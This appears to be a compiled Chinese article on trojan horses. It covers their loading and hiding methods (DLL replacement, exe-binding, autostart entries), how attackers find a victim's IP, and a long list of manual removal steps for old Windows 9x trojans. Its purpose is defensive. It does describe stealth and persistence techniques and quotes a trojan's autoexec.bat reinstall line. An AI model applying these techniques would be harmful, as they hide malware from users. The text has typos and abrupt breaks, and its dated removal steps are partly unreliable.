木马加载的方式可以说千奇百怪，无奇不有。但殊途同归，都为了达到一个共同的目的，那就是使你运行木马的服务端程序。如果木马不做任何伪装，就告诉你这是木马，你会运行它才怪呢。而随着网站互动化避程的不断进步，越来越多的东西可以成为木马的传播介质，Java Script、VBScript、ActiveX.XLM....几乎WWW每一个新功能部会导致木马的快速进化。

6.最新隐身技术

在Win9x时代，简单地注册为系统进程就可以从任务栏中消失，可是在Windows2000盛行的今天。这种方法遭到了惨败。注册为系统进程不仅仅能在任务栏中看到，而且可以直接在Services中直接控制停止。运行(太搞笑了，木马被客户端控制)。使用隐藏窗体或控制台的方法也不能欺骗无所不见的Admlin大人(要知道，在NT下，Administrator是可以看见所有进程的)。在研究了其他软件的长处之后，木马发现，Windows下的中文汉化软件采用的陷阱技术非常适合木马的使用。

这是一种更新、更隐蔽的方法。通过修改虚拟设备驱动程序(VXD)或修改动态遵掇库 (DLL)来加载木马。这种方法与一般方法不同，它基本上摆脱了原有的木马模式---监听端口，而采用替代系统功能的方法(改写vxd或DLL文件)，木马会将修改后的DLL替换系统已知的DLL，并对所有的函数调用进行过滤。对于常用的调用，使用函数转发器直接转发给被替换的系统DLL，对于一些相应的操作。实际上。这样的事先约定好的特种情况，DLL会执行一般只是使用DLL进行监听，一旦发现控制端的请求就激活自身，绑在一个进程上进行正常的木马操作。这样做的好处是没有增加新的文件，不需要打开新的端口，没有新的进程，使用常规的方法监测不到它。在往常运行时，木马几乎没有任何瘫状，且木马的控制端向被控制端发出特定的信息后，隐藏的程序就立即开始运作。

特洛伊木马具有的特性

1.包含干正常程序中，当用户执行正常程序时，启动自身，在用户难以察觉的情况下，完成一些危害用户的操作，具有隐蔽性。

由于木马所从事的是 "地下工作"，因此它必须隐藏起来，它会想尽一切办法不让你发现它。很多人对木马和远程控制软件有点分不清，还是让我们举个例子来说吧。我们进行局域网间通讯的常用软件PCanywhere大家一定不陌生吧?我们都知道它是一款远程控制软件。PCanywhere比在服务器端运行时，客户端与服务器端连接成功后，客户端机上会出现很醒目的提示标志;而木马类的软件的服务器端在运行的时候应用各种手段隐藏自己，不可能出现任何明显的标志。木马开发者早就想到了可能暴露木马踪迹的问题，把它们隐藏起来了。例如大家所熟悉木马修改注册表和而文件以便机器在下一次启动后仍能载入木马程式，它不是自己生成一个启动程序，而是依附在其他程序之中。有些木马把服务器端和正常程序绑定成一个程序的软件，叫做exe-binder绑定程序，可以让人在使用绑定的程序时，木马也入侵了系统。甚至有个别木马程序能把它自身的exe文件和服务端的图片文件绑定，在你看图片的时候，木马便侵人了你的系统。它的隐蔽性主要体现在以下两个方面:

(1)不产生图标

木马虽然在你系统启动时会自动运行，但它不会在 "任务栏"中产生一个图标，这是容易理解的，不然的话，你看到任务栏中出现一个来历不明的图标，你不起疑心才怪呢!

(2)木马程序自动在任务管理器中隐藏，并以"系统服务"的方式欺骗操作系统。

2.具有自动运行性。

木马为了控制服务端。它必须在系统启动时即跟随启动，所以它必须潜人在你的启动配置文件中，如win.ini、system.ini、winstart.bat以及启动组等文件之中。

3.包含具有未公开并且可能产生危险后果的功能的程序。

4.具备自动恢复功能。

现在很多的木马程序中的功能模块巴不再由单一的文件组成，而是具有多重备份，可以相互恢复。当你删除了其中的一个，以为万事大吉又运行了其他程序的时候，谁知它又悄然出现。像幽灵一样，防不胜防。

5.能自动打开特别的端口。

木马程序潜人你的电脑之中的目的主要不是为了破坏你的系统，而是为了获取你的系统中有用的信息，当你上网时能与远端客户进行通讯，这样木马程序就会用服务器客户端的通讯手段把信息告诉黑客们，以便黑客们控制你的机器，或实施进一步的人侵企图。你知道你的电脑有多少个端口?不知道吧?告诉你别吓着:根据TCP/IP协议，每台电脑可以有256乘以256个端口，也即从0到65535号 "门"，但我们常用的只有少数几个，木马经常利用我们不大用的这些端口进行连接，大开方便之 "门"。

6、功能的特殊性。

通常的木马功能都是十分特殊的，除了普通的文件操作以外，还有些木马具有搜索cache中的口令、设置口令、扫描目标机器人的IP地址、进行键盘记录、远程注册表的操作以及锁定鼠标等功能。上面所讲的远程控制软件当然不会有这些功能，毕竟远程控制软件是用来控制远程机器，方便自己操作而已，而不是用来黑对方的机器的。

　　“IP”作为Net用户的重要标示，是黑客首先需要了解的。获取的方法较多，黑客也会因不同的网络情况采取不同的方法，如：在局域网内使用Ping指令，Ping对方在网络中的名称而获得IP；在Internet上使用IP版的QQ直接显示。而最“牛”，也是最有效的办法是截获并分析对方的网络数据包。这是用Windows 2003的网络监视器捕获的网络数据包，可能一般的用户比较难看懂这些16进制的代码，而对于了解网络知识的黑客，他们可以找到并直接通过软件解析截获后的数据包的IP包头信息，再根据这些信息了解具体的IP。

　　隐藏IP

　　虽然侦察IP的方法多样，但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言，就可以安装能够自动去掉发送数据包包头IP信息的一些软件。不过使用这些软件有些缺点，譬如：它耗费资源严重，降低计算机性能；在访问一些论坛或者网站时会受影响；不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理，由于使用代理服务器后，“转址服务”会对发送出去的数据包有所修改，致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet，特别是QQ使用“ezProxy”等代理软件连接后，IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件??网络新手IP隐藏器(如图2)，只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口，即可对http使用代理，比较适合由于IE和QQ泄漏IP的情况。

　　不过使用代理服务器，同样有一些缺点，如：会影响网络通讯的速度；需要网络上的一台能够提供代理能力的计算机，如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时，可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。

　　虽然代理可以有效地隐藏用户IP，但高深的黑客亦可以绕过代理，查找到对方的真实IP地址，用户在何种情况下使用何种方法隐藏IP，也要因情况而论。

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的Explorer ="C:/WINDOWS/expiorer.exe"
关闭Regedit
重新启动到MSDOS方式
删除c:/windows/expiorer.exe木马程序
注意：不要删除正确的ExpLorer.exe程序，它们之间只有i与L的差别。
重新启动。OK
3. Acid Shiver v1.0 + 1.0Mod + lmacid
清除木马的步骤：

重新启动到MSDOS方式
删除C:/windows/MSGSVR16.EXE
然后回到Windows系统
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的Explorer = "C:/WINDOWS/MSGSVR16.EXE"
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
删除右边的Explorer = "C:/WINDOWS/MSGSVR16.EXE"
关闭Regedit
重新启动。OK

重新启动到MSDOS方式
删除C:/windows/wintour.exe然后回到Windows系统
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的Wintour = "C:/WINDOWS/WINTOUR.EXE"
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
删除右边的Wintour = "C:/WINDOWS/WINTOUR.EXE"
关闭Regedit
重新启动。OK
4. Ambush
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的zka = "zcn32.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:/Windows/ zcn32.exe
重新启动。OK
5. AOL Trojan
清除木马的步骤：

启动到MSDOS方式
删除C:/ command.exe（删除前取消文件的隐含属性）
注意：不要删除真的command.com文件。
删除C:/ americ~1.0/buddyl~1.exe（删除前取消文件的隐含属性）
删除C:/ windows/system/norton~1/regist~1.exe（删除前取消文件的隐含属性）

打开WIN.INI文件
在[WINDOWS]下面"run="和"load="都加载者特洛伊木马程序的路径，必须清除它们：
run=
load=
保存WIN.INI

还要改正注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的WinProfile = c:/command.exe
关闭Regedit，重新启动Windows。OK
6. Asylum v0.1, 0.1.1, 0.1.2, 0.1.3 + Mini 1.0, 1.1
清除木马的步骤：

注意：木马程序默认文件名是wincmp32.exe，然而程序可以随意改变文件名。
我们可以根据木马修改的system.ini和win.ini两个文件来清除木马。
打开system.ini文件
在[BOOT]下面有个"shell=文件名"。正确的文件名是explorer.exe
如果不是"explorer.exe"，那么那个文件就是木马程序，把它查找出来，删除。
保存退出system.ini
打开win.ini文件
在[WINDOWS]下面有个run=
如果你看到=后面有路径文件名，必须把它删除。
正确的应该是run=后面什么也没有。
=后面的路径文件名就是木马，把它查找出来，删除。
保存退出win.ini。
OK
7. AttackFTP
清除木马的步骤：

打开win.ini文件
在[WINDOWS]下面有load=wscan.exe
删除wscan.exe ，正确是load=
保存退出win.ini。

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的Reminder="wscan.exe /s"
关闭Regedit，重新启动到MSDOS系统中
删除C:/windows/system/ wscan.exe
OK
8. Back Construction 1.0 - 2.5
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的"C:/WINDOWS/Cmctl32.exe"
关闭Regedit，重新启动到MSDOS系统中
删除C:/WINDOWS/Cmctl32.exe
OK
9. BackDoor v2.00 - v2.03
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的‘c:/windows/notpa.exe /o=yes‘
关闭Regedit，重新启动到MSDOS系统中
删除c:/windows/notpa.exe
注意：不要删除真正的notepad.exe笔记本程序
ＯＫ
10. BF Evolution v5.3.12
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的(Default)=" "
关闭Regedit，再次重新启动计算机。
将C:/windows/system/ .exe（空格exe文件）
ＯＫ
11. BioNet v0.84 - 0.92 + 2.21

0.8X版本是运行在Win95/98
0.9X以上版本有运行在Win95/98 和WinNT上两个软件
客户－服务器协议是一样的，因而NT客户能黑95/98被感染的机器，和Win95/98客户能黑NT被感染的系统完全一样。
清除木马的步骤：
首先准备一张98的启动盘，用它启动后，进入c:/windows目录下，用attrib libupd~1.exe -h
命令让木马程序可见，然后删除它。
抽出软盘后重新启动，进入98下，在注册表里找到：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
的子键WinLibUpdate = "c:/windows/libupdate.exe -hide"
将此子键删除。

12. Bla v1.0 - 5.03
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的Systemdoor = "C:/WINDOWS/System/mprdll.exe"
关闭Regedit，重新启动计算机。
查找到C:/WINDOWS/System/mprdll.exe和
C:/WINDOWS/system/rundll.exe
注意：不要删除C:/WINDOWS/RUNDLL.EXE正确文件。
并删除两个文件。
OK
13. BladeRunner
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
可以找到System-Tray = "c:/something/something.exe"
右边的路径可能是任何东西，这时你不需要删除它，因为木马会立即自动加上，你需要的是记下木马的名字与目录，然后退回到MS-DOS下，找到此木马文件并删除掉。
重新启动计算机，然后重复第一步，在注册表中找到木马文件并删除此键。

14. Bobo v1.0 - 2.0
清除木马v1.0
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
删除右边的DirrectLibrarySupport ="C:/WINDOWS/SYSTEM/Dllclient.exe"
关闭Regedit，重新启动计算机。
DEL C:/Windows/System/Dllclient.exe
OK

清除木马v2.0
打开注册表Regedit
点击目录至：
HKEY_USER/.Default/Software/Mirabilis/ICQ/Agent/Apps/ICQ Accel/
ICQ Accel是一个“假象“的主键，选中ICQ Accel主键并把它删除。
重新启动计算机。OK
15. BrainSpy vBeta
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
右边有 ??? = "C:/WINDOWS/system/BRAINSPY .exe"
???标签选是随意改变的。
关闭Regedit，重新启动计算机
查找删除C:/WINDOWS/system/BRAINSPY .exe
ＯＫ
16. Cain and Abel v1.50 - 1.51
这是一个口令木马

进入MS-DOS方式
查找到C:/windows/msabel32.exe
并删除它。ＯＫ
17. Canasson
清除木马的步骤：

打开WIN.INI文件
查找c:/msie5.exe，删除全部主键
保存win.ini
重新启动计算机
删除c:/msie5.exe木马文件
ＯＫ
18. Chupachbra
清除木马的步骤：

打开WIN.INI文件
[Windows]的下面有两个行
run=winprot.exe
load=winprot.exe
删除winprot.exe
run=
load=
保存Win.ini，再打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
删除右边的‘System Protect‘ = winprot.exe
重新启动Windows
查找到C:/windows/system/ winprot.exe，并删除。
ＯＫ
19. Coma v1.09
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
删除右边的‘RunTime‘ = C:/windows/msgsrv36.exe
重新启动Windows
查找到C:/windows/ msgsrv36.exe，并删除。
ＯＫ
20. Control
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
删除右边的Load MSchv Drv = C:/windows/system/MSchv.exe
保存Regedit，重新启动Windows
查找到C:/windows/system/MSchv.exe，并删除。
ＯＫ
21. Dark Shadow
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/RunServices
删除右边的winfunctions="winfunctions.exe"
保存Regedit，重新启动Windows
查找到C:/windows/system/ winfunctions.exe，并删除。
ＯＫ
22. DeepThroat v1.0 - 3.1 + Mod (Foreplay)
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
版本1.0
删除右边的项目‘System32‘=c:/windows/system32.exe
版本2.0-3.1
删除右边的项目‘SystemTray‘ = ‘Systray.exe‘
保存Regedit，重新启动Windows
版本1.0删除c:/windows/system32.exe
版本2.0-3.1
删除c:/windows/system/systray.exe
ＯＫ
23. Delta Source v0.5 - 0.7
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
删除右边的项目：DS admin tool = C:/TEMPSERVER.exe
保存Regedit，重新启动Windows
查找到C:/TEMPSERVER.exe，并删除它。
ＯＫ
24. Der Spaeher v3
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
删除右边的项目：explore = "c:/windows/system/dkbdll.exe "
保存Regedit，重新启动Windows
删除c:/windows/system/dkbdll.exe木马文件。
ＯＫ
25. Doly v1.1 - v1.7 (SE)
清除木马V1.1-V1.5版本：

这几个木马版本的木马程序放在三处，增加二个注册项目，还增加到Win.ini项目。
首先，进入MS-DOS方式，删除三个木马程序，但V1.35版本多一个木马文件mdm.exe。
把下列各项全部删除：
C:/WINDOWS/SYSTEM/tesk.sys
C:/WINDOWS/Start Menu/Programs/Startup/mstesk.exe
c:/Program Files/MStesk.exe
c:/Program Files/Mdm.exe
重新启动Windows。

接着，打开win.ini文件
找到[WINDOWS]下面load=c:/windows/system/tesk.exe项目，删除路径，改变为load=
保存win.ini文件。

最后，修改注册表Regedit
找到以下两个项目并删除它们
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run
Ms tesk = "C:/Program Files/MStesk.exe"
和
HKEY_USER/.Default/Software/Microsoft/Windows/CurrentVersion/Run
Ms tesk = "C:/Program Files/MStesk.exe"
再寻找到HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/ss
这个组是木马的全部参数选择和设置的服务器，删除这个ss组的全部项目。
关闭保存Regedit。
还有打开C:/AUTOEXEC.BAT文件，删除
@echo off copy c:/sys.lon c:/windows/StartMenu/Startup Items/
del c:/win.reg
关闭保存autoexec.bat。
ＯＫ

清除木马V1.6版本：
该木马运行时，将不能通过98的正常操作关闭，只能RESET键。彻底清除步骤如下：
1．打开控制面板——添加删除程序——删除memory manager 3.0，这就是木马程序，但是它并不会把木马的EXE文件删除掉。
2．用98或DOS启动盘启动（用RESET键）后，转入C:/，编辑AUTOEXEC。BAT，把如下内容删除：
@echo off copy c:/sys.lon c:/windows/startm~1/programs/startup/mdm.exe
del c:/win.reg
保存AUTOEXEC。BAT文件并返回DOS后，在C：/根目录下删除木马文件：
del sys.lon
del windows/startm~1/programs/startup/mdm.exe
del progra~1/mdm.exe
3．抽出软盘重新启动，进入98后，把c:/program files/目录下的memory manager 目录删除。

清除木马V1.7版本：
首先，打开C:/AUTOEXEC.BAT文件，删除
@echo off copy c:/sys.lon c:/windows/startm~1/programs/startup/mdm.exe
del c:/win.reg
关闭保存autoexec.bat

然后打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/MicroSoft/Windows/CurrentVersion/Run
找到c:/windows/system/mdm.exe路径并删除这个项目
点击目录至：
HKEY_USER/.Default/Software/Marabilis/ICQ/Agent/Apps/
找到"C:/windows/system/kernal32.exe"路径并删除这个项目
关闭保存Regedit。重新启动Windows。

最后，删除以下木马程序：
c:/sys.lon
c:/iecookie.exe
c:/windows/start menu/programs/startup/mdm.exe
c:/program files/mdm.exe
c:/windows/system/mdm.exe
c:/windows/system/kernal32.exe
注意：kernal32是Ａ
ＯＫ

26. Donald Dick v1.52 - 1.55
清除木马V1.52-1.53版本：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/system/CurrentControlSet/Services/VxD/VMLDIR/
删除右边的项目：StaticVxD = "vmldir.vxd"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/System/vmldir.vxd
ＯＫ

清除木马V1.54-1.55版本：

这两个版本跟上面的版本只是默认文件名不同，其它都一样，
把vmldir.vxd改为intld.vdx即可。
27. Drat v1.0 - 3.0b
清除木马的步骤：

打开注册表Regedit
点击目录至：hkey_classes_root/exefile/shell/open/command
找到@=SHELL32 /"%1/" %*把它更改为@="%1" %*
关闭保存Regedit，重新启动Windows。
查找c:/windows/下shell32．＊文件，并删除它。
ＯＫ
28. Eclipse 2000
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：bybt = "c:/windows/system/eclipse2000.exe"
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/ RunServices/
删除右边的项目：cksys = "c:/windows/system/ could be anything .exe"
关闭保存Regedit，重新启动Windows
查找到eclipse2000.exe木马文件，并删除

29. Eclypse v1.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Rnaapp ="C:/WINDOWS/SYSTEM/rmaapp.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/SYSTEM/rmaapp.exe
注意：不要删除Rnaapp.exe
ＯＫ
30. Executer v1
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
在右边的项目查找到"C:/windows/sexec.exe"，并删除。
关闭保存Regedit，重新启动Windows
相应删除木马程序文件。
ＯＫ
31. FakeFTP beta
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Rundll32 = rundll3.tww /h
关闭保存Regedit，重新启动Windows
找到C:/windows/文件夹下的三个文件并删除它们
rundll3.bat - 9x.reg - nt.reg
ＯＫ
32. Forced Entry
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：MicrosoftRegistration32 = "C:/somepath /trojanhrs.exe"
关闭保存Regedit，重新启动Windows
由于路径容易改变，只要查找到trojanhrs.exe，并删除它。
33. GateCrasher v1.0 - 1.2
清除木马v1.0：
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Explore=‘c:/windows/explore.exe‘
关闭保存Regedit，重新启动Windows
然后，删除相应的木马程序。
ＯＫ

清除木马v1.1：
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Inet=‘EXPLORE.EXE‘
关闭保存Regedit，重新启动Windows
然后，找到相应的木马程序，并删除。
ＯＫ

清除木马v1.2：
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Command = ‘c:/windows/system.exe‘

关闭保存Regedit，重新启动Windows
然后，找到相应的木马程序，并删除。
ＯＫ
34. Girlfriend v1.3x (Including Patch 1 and 2)
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Windll.exe ="C:/windows/windll.exe"
Regedit里也保存着服务器的数据
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/General
删除General项目标题
关闭保存Regedit，重新启动Windows
然后，找到相应的木马程序，并删除。
ＯＫ
35. Golden Retreiver v1.1b
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Task Manager="c:/mstask.exe"
关闭保存Regedit，重新启动Windows
然后，找到相应的木马程序，并删除。
ＯＫ
36. Hack`a`Tack 1.0 - 2000
清除木马v1.0-1.2：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Explorer32 ="C:/windows/Expl32.exe"
关闭保存Regedit，重新启动Windows
然后，找到相应的木马程序，并删除。
ＯＫ

清除木马v2000：
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Configuration Wizard = c:/windows/cfgwiz32.exe
关闭保存Regedit，重新启动Windows
删除c:/windows/cfgwiz32.exe
ＯＫ
37. Hack99 KeyLogger
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：HKeyLog = "C:/Windows/System/HKeyLog.exe"
关闭保存Regedit，重新启动Windows
删除C:/Windows/System/HKeyLog.exe
ＯＫ
38. HostControl v1.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：RegClean = "c:/windows/inf/regcle32.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/inf/regcle32.exe
ＯＫ
39. Hvl Rat v5.30
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Explorer = "C:/WINDOWS/system/MSGSVR16.EXE"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/system/MSGSVR16.EXE
ＯＫ
40. ik97 v1.2
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：ik = ‘c:/progra~1/ik/ik.exe‘
关闭保存Regedit，重新启动Windows
删除C:/Program Files/ik/ik.exe
ＯＫ
41. InCommand v1.0 - 1.5
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
找到右边的项目：AdvancedSettings = *
注意：*表示就是木马的存放路径与文件名，记下后删除此键。
关闭保存Regedit，重新启动Windows
按照刚才记下的木马路径与文件名删除木马程序。
42. IndocTrination v0.1 - v0.11
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices/
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce/
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesOnce/
每项标题都包括Msgsrv16 ="Msgsrv16"项目
删除每个项目
关闭保存Regedit，重新启动Windows
删除C:/windows/system/msgserv16.exe
ＯＫ
43. inet v2.0 - 2.0n
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Explorer = "C:/WINDOWS/system/inet.exe"
关闭保存Regedit，重新启动Windows
删除"C:/WINDOWS/system/inet.exe"
删除"C:/WINDOWS/system/inet.dll"
ＯＫ
44. Infector v1.0 - 1.42
清除木马的步骤：

打开system.ini文件
找到shell=explorer.exe c:/path/to/trojan.exe项目
改为：shell=explorer.exe
保存关闭system.ini文件，重新启动Windows
删除c:/path/to/trojan.exe
ＯＫ
45. iniKiller v1.2 - 3.2 Pro
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Explore="C:/windows/bad.exe "
关闭保存Regedit，重新启动Windows
删除C:/windows/bad.exe
ＯＫ
46. Intruder
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：PPModule1 = ‘ppmod1.sys‘
关闭保存Regedit，重新启动Windows
删除C:/windows/system/ ppmod1.sys
删除C:/windows/system/ ppmod2.sys
ＯＫ
47. IRC3
清除木马的步骤：

打开win.ini文件
找到load=closew项目，更改为：load=
保存关闭win.ini，重新启动Windows
查找这两个文件‘rundlls.exe‘ 、‘closew.bat‘
并删除它们。
ＯＫ
48. Kaos v1.1 - 1.3
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Sys="c:/windows/shell32.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/shell32.exe
ＯＫ
49. Khe Sanh v2.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：TBoot0001="c:/windows/system/trjp.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/system/trjp.exe
ＯＫ
50. Kuang logger
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：K2logas.task ="C:/WINDOWS/SYSTEM/K2logas.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/SYSTEM/K2logas.exe
ＯＫ
51. Kuang Original - 0.34
清除木马v Original版本：
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Temp$1.task = "c:/windows/system/temp$1.exe"
清除木马v 0.20-0.21版本：
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：K2PS.task = "c:/windows/system/k2ps.exe"
清除木马v 0.30-0.34版本：
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：K2PS_full.task = "c:/windows/system/k2ps_full.exe"

关闭保存Regedit，重新启动Windows
查找相对应的木马程序，并删除。
ＯＫ
52. Logger
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：??? = "C:/windows/system/logged.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/SYSTEM/ logged.exe
ＯＫ
53. Magic Horse
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SpoolerService="c:/windows/spoolsrv.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/spoolsrv.exe
ＯＫ
54. Malicious
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_USERS/.Default/Software/Microsoft/Windows/CurrentVersion/Policies/
删除右边的五个项目：DisableRegistryTools NoRun NoFind NoDesktop NoClose
关闭保存Regedit，重新启动Windows
OK
55. Masters Paradise
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SYSEDIT = c:/windows/ sysedit.exe
